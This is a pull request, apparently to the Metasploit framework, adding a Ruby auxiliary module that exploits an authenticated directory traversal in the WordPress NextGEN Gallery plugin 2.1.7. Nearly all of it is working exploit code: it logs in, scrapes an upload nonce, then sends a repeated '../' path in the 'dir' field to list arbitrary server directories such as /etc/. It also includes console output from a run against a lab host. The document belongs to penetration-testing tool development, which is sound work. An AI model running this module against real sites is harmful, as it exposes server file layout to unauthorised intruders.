### PR TITLE
Add WP NextGEN Gallery Directory Traversal Vuln

### DIFF
--- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb
@@ -140,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary
         'nextgen.traversal',
         'text/plain',
         ip,
-        paths,
+        paths * "\n",
         fname
       )
 

--- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb
@@ -1,0 +1,141 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress NextGEN Gallery Directory Read Vulnerability',
+      'Description'    => %q{
+        This module exploits an authenticated directory traversal vulnerability
+        in WordPress Plugin "NextGEN Gallery" version 2.1.7, allowing
+        to read arbitrary directories with the web server privileges.
+      },
+      'References'     =>
+        [
+          ['WPVDB', '8165'],
+          ['URL', 'http://permalink.gmane.org/gmane.comp.security.oss.general/17650']
+        ],
+      'Author'         =>
+        [
+          'Sathish Kumar', # Vulnerability Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('WP_USER', [true, 'A valid username', nil]),
+        OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]),
+        OptString.new('DIRPATH', [true, 'The path to the directory to read', '/etc/']),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])
+      ], self.class)
+  end
+
+  def user
+    datastore['WP_USER']
+  end
+
+  def password
+    datastore['WP_PASS']
+  end
+
+  def check
+    check_plugin_version_from_readme('nextgen-gallery', '2.1.9')
+  end
+
+  def get_nonce(cookie)
+    res = send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_backend, 'admin.php'),
+      'method' => 'GET',
+      'vars_get'  => {
+        'page'    => 'ngg_addgallery'
+      },
+      'cookie' => cookie
+    )
+
+    if res && res.redirect? && res.redirection
+      location = res.redirection
+      print_status("#{peer} - Following redirect to #{location}")
+      res = send_request_cgi(
+        'uri'    => location,
+        'method' => 'GET',
+        'cookie' => cookie
+      )
+    end
+
+    res.body.scan(/var browse_params = {"nextgen_upload_image_sec":"(.+)"};/).flatten.first
+  end
+
+  def run_host(ip)
+    vprint_status("#{peer} - Trying to login as: #{user}")
+    cookie = wordpress_login(user, password)
+    if cookie.nil?
+      print_error("#{peer} - Unable to login as: #{user}")
+      return
+    end
+
+    vprint_status("#{peer} - Trying to get nonce...")
+    nonce = get_nonce(cookie)
+    if nonce.nil?
+      print_error("#{peer} - Can not get nonce after login")
+      return
+    end
+    vprint_status("#{peer} - Got nonce: #{nonce}")
+
+    traversal = "../" * datastore['DEPTH']
+    filename = datastore['DIRPATH']
+    filename = filename[1, filename.length] if filename =~ /^\//
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path),
+      'headers'   => {
+        'Referer' => "http://#{rhost}/wordpress/wp-admin/admin.php?page=ngg_addgallery",
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_get'  => {
+        'photocrati_ajax' => '1'
+      },
+      'vars_post' => {
+        'nextgen_upload_image_sec' => "#{nonce}",
+        'action' => 'browse_folder',
+        'dir' => "#{traversal}#{filename}"
+      },
+      'cookie'    => cookie
+    )
+
+    if res && res.code == 200 && res.body && res.body.to_s.length > 0
+      begin
+        results = JSON.parse(res.body)['html']
+      rescue JSON::ParserError
+        vprint_error("#{peer} - Unable to parse JSON")
+        return
+      end
+
+      res_new = results.gsub(/<u(.*)>/, '').gsub(/<\/ul>/, '').gsub(/<l(.*)"\/..\/..\/..\/../, '').gsub(/"(.*)i>/, '')
+      vprint_line("#{res_new}")
+      fname = datastore['FILEPATH']
+      path = store_loot(
+        'nextgen.traversal',
+        'text/plain',
+        ip,
+        res_new,
+        fname
+      )
+
+      print_good("#{peer} - File saved in: #{path}")
+    else
+      print_error("#{peer} - Nothing was downloaded. You can try to change the DIRPATH.")
+    end
+  end
+end


### PR DESCRIPTION
#### Add WordPress Plugin NextGEN Gallery Auth Directory Traversal Vulnerability.

  Application: WordPress Plugin 'NextGEN Galley' 2.1.7
  Homepage: https://wordpress.org/plugins/nextgen-gallery/
  Source Code: https://downloads.wordpress.org/plugin/nextgen-gallery.2.1.7.zip
  Active Installs (wordpress.org): 1 Million+
  References: https://wpvulndb.com/vulnerabilities/8165
#### Vulnerable packages*

  2.1.7
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
 msf> auxiliary(wp_nextgen_galley_dir_read)  run

[+] 192.168.1.63:80 - File saved in: /home/espreto/.msf4/loot/20150901032100_default_192.168.1.63_nextgen.traversa_756306.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 msf> auxiliary(wp_nextgen_galley_dir_read)  head /home/espreto/.msf4/loot/20150901032100_default_192.168.1.63_nextgen.traversa_756306.txt
[*] exec: head /home/espreto/.msf4/loot/20150901032100_default_192.168.1.63_nextgen.traversa_756306.txt

/etc/.java/
/etc/acpi/
/etc/alternatives/
/etc/apache2/
/etc/apm/
/etc/apparmor/
/etc/apparmor.d/
/etc/apport/
/etc/apt/
 msf> auxiliary(wp_nextgen_galley_dir_read)  set DIRPATH /var/www/
DIRPATH => /var/www/
 msf> auxiliary(wp_nextgen_galley_dir_read)  run

[+] 192.168.1.63:80 - File saved in: /home/espreto/.msf4/loot/20150901032225_default_192.168.1.63_nextgen.traversa_376098.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 msf> auxiliary(wp_nextgen_galley_dir_read)  head /home/espreto/.msf4/loot/20150901032225_default_192.168.1.63_nextgen.traversa_376098.txt
[*] exec: head /home/espreto/.msf4/loot/20150901032225_default_192.168.1.63_nextgen.traversa_376098.txt

/var/www/html/
/var/www/logs/
/var/www/simple-backup/
/var/www/wp-admin/
/
/var/www/wp-includes/
 msf> auxiliary(wp_nextgen_galley_dir_read)
```

A big thank you to the @wchen-r7 for help with the nonce. :+1: 
